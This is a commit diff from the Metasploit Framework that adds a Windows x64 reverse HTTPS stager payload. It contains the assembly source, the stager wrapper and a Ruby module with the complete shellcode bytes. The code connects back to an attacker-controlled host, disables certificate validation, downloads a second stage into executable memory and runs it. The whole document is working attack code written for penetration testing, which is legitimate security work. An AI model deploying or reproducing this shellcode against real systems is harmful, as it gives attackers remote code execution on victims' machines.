Land rapid7#1821, x64_reverse_https payload

Tod Beardsley · Tod Beardsley · commit dc014ede360a · 2013-05-30T16:09:33.000-05:00
diff --git a/external/source/shellcode/windows/x64/bin/stager_reverse_https.bin b/external/source/shellcode/windows/x64/bin/stager_reverse_https.bin
diff --git a/external/source/shellcode/windows/x64/src/block/block_reverse_https.asm b/external/source/shellcode/windows/x64/src/block/block_reverse_https.asm
@@ -0,0 +1,158 @@
+;-----------------------------------------------------------------------------;
+; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
+; Rewrited to x64 by agix
+; Compatible: Windows 7
+; Architecture: x64
+;-----------------------------------------------------------------------------;
+[BITS 64]
+
+; Input: RBP must be the address of 'api_call'.
+; Output: RDI will be the socket for the connection to the server
+; Clobbers: RAX, RCX, RDX, RDI, R8, R9, R10, R12, R13, R14, R15
+
+load_wininet:
+  ; setup the structures we need on the stack...
+  mov r14, 'wininet'
+  push r14               ; Push the bytes 'wininet',0 onto the stack.
+  mov r14, rsp           ; save pointer to the "wininet" string for LoadLibraryA call.
+  mov rcx, r14           ; set the param for the library to load
+  mov r10, 0x0726774C    ; hash( "kernel32.dll", "LoadLibraryA" )
+  call rbp               ; LoadLibraryA( "ws2_32" )
+
+internetopen:
+  push byte 0            ; NULL pointer
+  mov rcx, rsp           ; LPCTSTR lpszAgent ("\x00")
+  xor rdx, rdx           ; DWORD dwAccessType (PRECONFIG = 0)
+  xor r8, r8             ; LPCTSTR lpszProxyName
+  xor r9, r9             ; LPCTSTR lpszProxyBypass
+  push r8                ; DWORD dwFlags
+  push r8                ; alignment
+  mov r10, 0xA779563A    ; hash( "wininet.dll", "InternetOpenA" )
+  call rbp
+
+  jmp dbl_get_server_host
+
+internetconnect:
+  pop rdx                ; LPCTSTR lpszServerName
+  mov rcx, rax           ; HINTERNET hInternet
+  mov r8, 4444           ; PORT
+  xor r9, r9             ; LPCTSTR lpszUsername
+  push r9                ; DWORD_PTR dwContext (NULL)
+  push r9                ; DWORD dwFlags
+  push 3                 ; DWORD dwService (INTERNET_SERVICE_HTTP)
+  push r9                ; alignment
+  mov r10, 0xC69F8957    ; hash( "wininet.dll", "InternetConnectA" )
+  call rbp
+
+  jmp get_server_uri
+
+httpopenrequest:
+  mov rcx, rax           ; HINTERNET hConnect
+  xor rdx, rdx           ; LPCTSTR lpszVerb
+  pop r8                 ; LPCTSTR lpszObjectName
+  xor r9, r9             ; LPCTSTR lpszVersion
+  push rdx               ; DWORD_PTR dwContext
+  push qword (0x0000000080000000 | 0x0000000004000000 | 0x0000000000800000 | 0x0000000000200000 | 0x0000000000001000 |0x0000000000002000 |0x0000000000000200) ; dwFlags
+    ;0x80000000 |        ; INTERNET_FLAG_RELOAD
+    ;0x04000000 |        ; INTERNET_NO_CACHE_WRITE
+    ;0x00800000 |        ; INTERNET_FLAG_SECURE
+    ;0x00200000 |        ; INTERNET_FLAG_NO_AUTO_REDIRECT
+    ;0x00001000 |        ; INTERNET_FLAG_IGNORE_CERT_CN_INVALID
+    ;0x00002000 |        ; INTERNET_FLAG_IGNORE_CERT_DATE_INVALID
+    ;0x00000200          ; INTERNET_FLAG_NO_UI
+  push rdx               ; LPCTSTR *lplpszAcceptTypes
+  push rdx               ; LPCTSTR lpszReferer
+  mov r10, 0x3B2E55EB    ; hash( "wininet.dll", "HttpOpenRequestA" )
+  call rbp
+  mov rsi, rax
+
+retry:
+  push byte 10
+  pop rdi
+
+; InternetSetOption (hReq, INTERNET_OPTION_SECURITY_FLAGS, &dwFlags, sizeof (dwFlags) );
+internetsetoption:
+  mov rcx, rsi           ; HINTERNET hInternet
+  mov rdx, 31            ; DWORD dwOption (INTERNET_OPTION_SECURITY_FLAGS)
+  push qword 0x00003380
+    ;0x00002000 |        ; SECURITY_FLAG_IGNORE_CERT_DATE_INVALID
+    ;0x00001000 |        ; SECURITY_FLAG_IGNORE_CERT_CN_INVALID
+    ;0x00000200 |        ; SECURITY_FLAG_IGNORE_WRONG_USAGE
+    ;0x00000100 |        ; SECURITY_FLAG_IGNORE_UNKNOWN_CA
+    ;0x00000080          ; SECURITY_FLAG_IGNORE_REVOCATION
+  mov r8, rsp
+  mov r9, 4              ; sizeof(dwFlags)
+  mov r10, 0x869E4675    ; hash( "wininet.dll", "InternetSetOptionA" )
+  call rbp
+
+httpsendrequest:
+  mov rcx, rsi           ; HINTERNET hRequest
+  xor rdx, rdx           ; LPCTSTR lpszHeaders
+  xor r8, r8             ; DWORD dwHeadersLength
+  xor r9, r9             ; LPVOID lpOptional
+  push rdx               ; DWORD dwOptionalLength
+  mov r10, 0x7B18062D    ; hash( "wininet.dll", "HttpSendRequestA" )
+  call rbp
+  test eax,eax
+  jnz short allocate_memory
+
+try_it_again:
+  dec rdi
+  jz failure
+  jmp short internetsetoption
+
+dbl_get_server_host:
+  jmp get_server_host
+
+get_server_uri:
+  call httpopenrequest
+
+server_uri:
+ db "/12345", 0x00
+
+failure:
+  mov r14, 0x56A2B5F0    ; hardcoded to exitprocess for size
+  call rbp
+
+allocate_memory:
+  xor rcx, rcx           ; LPVOID lpAddress
+  mov rdx, 0x00400000    ; SIZE_T dwSize
+  mov r8, 0x1000         ; DWORD flAllocationType(MEM_COMMIT)
+  mov r9, 0x40           ; DWORD flProtect(PAGE_EXECUTE_READWRITE)
+  mov r10, 0xE553A458    ; hash( "kernel32.dll", "VirtualAlloc" )
+  call rbp
+
+download_prep:
+  xchg rax, rbx          ; place the allocated base address in ebx
+  push rbx               ; store a copy of the stage base address on the stack
+  push rbx               ; temporary storage for bytes read count
+  mov rdi, rsp           ; &bytesRead
+
+download_more:
+  mov rcx, rsi           ; HINTERNET hFile
+  mov rdx, rbx           ; LPVOID lpBuffer
+  mov r8, 8192           ; DWORD dwNumberOfBytesToRead
+  mov r9, rdi            ; LPDWORD lpdwNumberOfBytesRead
+  mov r10, 0xE2899612    ; hash( "wininet.dll", "InternetReadFile" )
+  call rbp
+  add rsp, 32            ; clean reserverd space
+
+  test eax,eax           ; download failed? (optional?)
+  jz failure
+
+  mov rax, [rdi]
+  add rbx, rax           ; buffer += bytes_received
+
+  test rax,rax           ; optional?
+  jnz download_more      ; continue until it returns 0
+  pop rax                ; clear the temporary storage
+  pop rax                ; f*cking alignment
+
+execute_stage:
+  ret                    ; dive into the stored stage address
+
+get_server_host:
+  call internetconnect
+
+server_host:
+
diff --git a/external/source/shellcode/windows/x64/src/stager/stager_reverse_https.asm b/external/source/shellcode/windows/x64/src/stager/stager_reverse_https.asm
@@ -0,0 +1,20 @@
+;-----------------------------------------------------------------------------;
+; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
+; Rewrited to x64 by agix
+; Compatible: Windows 7
+; Architecture: x64
+; Size: 570 bytes
+; Build: >build.py stager_reverse_https
+;-----------------------------------------------------------------------------;
+
+[BITS 64]
+[ORG 0]
+
+  cld                    ; Clear the direction flag.
+  and rsp, 0xFFFFFFFFFFFFFFF0 ; Ensure RSP is 16 byte aligned
+  call start             ; Call start, this pushes the address of 'api_call' onto the stack.
+%include "./src/block/block_api.asm"
+start:                   ;
+  pop rbp                ; pop off the address of 'api_call' for calling later.
+%include "./src/block/block_reverse_https.asm"
+  ; By here we will have performed the reverse_tcp connection and EDI will be our socket
diff --git a/modules/payloads/stagers/windows/x64/reverse_https.rb b/modules/payloads/stagers/windows/x64/reverse_https.rb
@@ -0,0 +1,101 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+
+require 'msf/core'
+require 'msf/core/handler/reverse_https'
+
+
+module Metasploit3
+
+	include Msf::Payload::Stager
+	include Msf::Payload::Windows
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'Windows x64 Reverse HTTPS Stager',
+			'Description'   => 'Tunnel communication over HTTP using SSL (Windows x64)',
+			'Author'        => 'hdm (x64 rewrite by agix)',
+			'License'       => MSF_LICENSE,
+			'Platform'      => 'win',
+			'Arch'          => ARCH_X86_64,
+			'Handler'       => Msf::Handler::ReverseHttps,
+			'Convention'    => 'sockrdi https',
+			'Stager'        =>
+				{
+					'Offsets' =>
+						{
+							# Disabled since it MUST be ExitProcess to work on WoW64 unless we add EXITFUNK support (too big right now)
+							# 'EXITFUNC' => [ 290, 'V' ],
+							'LPORT'    => [ 282, 'v' ], # Not a typo, really little endian
+						},
+					'Payload' =>
+						"\xFC\x48\x83\xE4\xF0\xE8\xC8\x00\x00\x00\x41\x51\x41\x50\x52\x51" +
+						"\x56\x48\x31\xD2\x65\x48\x8B\x52\x60\x48\x8B\x52\x18\x48\x8B\x52" +
+						"\x20\x48\x8B\x72\x50\x48\x0F\xB7\x4A\x4A\x4D\x31\xC9\x48\x31\xC0" +
+						"\xAC\x3C\x61\x7C\x02\x2C\x20\x41\xC1\xC9\x0D\x41\x01\xC1\xE2\xED" +
+						"\x52\x41\x51\x48\x8B\x52\x20\x8B\x42\x3C\x48\x01\xD0\x66\x81\x78" +
+						"\x18\x0B\x02\x75\x72\x8B\x80\x88\x00\x00\x00\x48\x85\xC0\x74\x67" +
+						"\x48\x01\xD0\x50\x8B\x48\x18\x44\x8B\x40\x20\x49\x01\xD0\xE3\x56" +
+						"\x48\xFF\xC9\x41\x8B\x34\x88\x48\x01\xD6\x4D\x31\xC9\x48\x31\xC0" +
+						"\xAC\x41\xC1\xC9\x0D\x41\x01\xC1\x38\xE0\x75\xF1\x4C\x03\x4C\x24" +
+						"\x08\x45\x39\xD1\x75\xD8\x58\x44\x8B\x40\x24\x49\x01\xD0\x66\x41" +
+						"\x8B\x0C\x48\x44\x8B\x40\x1C\x49\x01\xD0\x41\x8B\x04\x88\x48\x01" +
+						"\xD0\x41\x58\x41\x58\x5E\x59\x5A\x41\x58\x41\x59\x41\x5A\x48\x83" +
+						"\xEC\x20\x41\x52\xFF\xE0\x58\x41\x59\x5A\x48\x8B\x12\xE9\x4F\xFF" +
+						"\xFF\xFF\x5D\x49\xBE\x77\x69\x6E\x69\x6E\x65\x74\x00\x41\x56\x49" +
+						"\x89\xE6\x4C\x89\xF1\x49\xBA\x4C\x77\x26\x07\x00\x00\x00\x00\xFF" +
+						"\xD5\x6A\x00\x48\x89\xE1\x48\x31\xD2\x4D\x31\xC0\x4D\x31\xC9\x41" +
+						"\x50\x41\x50\x49\xBA\x3A\x56\x79\xA7\x00\x00\x00\x00\xFF\xD5\xE9" +
+						"\x9B\x00\x00\x00\x5A\x48\x89\xC1\x49\xB8\x5C\x11\x00\x00\x00\x00" +
+						"\x00\x00\x4D\x31\xC9\x41\x51\x41\x51\x6A\x03\x41\x51\x49\xBA\x57" +
+						"\x89\x9F\xC6\x00\x00\x00\x00\xFF\xD5\xEB\x79\x48\x89\xC1\x48\x31" +
+						"\xD2\x41\x58\x4D\x31\xC9\x52\x68\x00\x32\xA0\x84\x52\x52\x49\xBA" +
+						"\xEB\x55\x2E\x3B\x00\x00\x00\x00\xFF\xD5\x48\x89\xC6\x6A\x0A\x5F" +
+						"\x48\x89\xF1\x48\xBA\x1F\x00\x00\x00\x00\x00\x00\x00\x68\x80\x33" +
+						"\x00\x00\x49\x89\xE0\x49\xB9\x04\x00\x00\x00\x00\x00\x00\x00\x49" +
+						"\xBA\x75\x46\x9E\x86\x00\x00\x00\x00\xFF\xD5\x48\x89\xF1\x48\x31" +
+						"\xD2\x4D\x31\xC0\x4D\x31\xC9\x52\x49\xBA\x2D\x06\x18\x7B\x00\x00" +
+						"\x00\x00\xFF\xD5\x85\xC0\x75\x24\x48\xFF\xCF\x74\x13\xEB\xB1\xE9" +
+						"\x81\x00\x00\x00\xE8\x82\xFF\xFF\xFF\x2F\x31\x32\x33\x34\x35\x00" +
+						"\x49\xBE\xF0\xB5\xA2\x56\x00\x00\x00\x00\xFF\xD5\x48\x31\xC9\x48" +
+						"\xBA\x00\x00\x40\x00\x00\x00\x00\x00\x49\xB8\x00\x10\x00\x00\x00" +
+						"\x00\x00\x00\x49\xB9\x40\x00\x00\x00\x00\x00\x00\x00\x49\xBA\x58" +
+						"\xA4\x53\xE5\x00\x00\x00\x00\xFF\xD5\x48\x93\x53\x53\x48\x89\xE7" +
+						"\x48\x89\xF1\x48\x89\xDA\x49\xB8\x00\x20\x00\x00\x00\x00\x00\x00" +
+						"\x49\x89\xF9\x49\xBA\x12\x96\x89\xE2\x00\x00\x00\x00\xFF\xD5\x48" +
+						"\x83\xC4\x20\x85\xC0\x74\x99\x48\x8B\x07\x48\x01\xC3\x48\x85\xC0" +
+						"\x75\xCE\x58\x58\xC3\xE8\xDA\xFE\xFF\xFF"
+				}
+			))
+	end
+
+	#
+	# Do not transmit the stage over the connection.  We handle this via HTTPS
+	#
+	def stage_over_connection?
+		false
+	end
+
+	#
+	# Generate the first stage
+	#
+	def generate
+		p = super
+		i = p.index("/12345\x00")
+		u = "/" + generate_uri_checksum(Msf::Handler::ReverseHttps::URI_CHECKSUM_INITW) + "\x00"
+		p[i, u.length] = u
+		p + datastore['LHOST'].to_s + "\x00"
+	end
+
+	#
+	# Always wait at least 20 seconds for this payload (due to staging delays)
+	#
+	def wfs_delay
+		20
+	end
+end
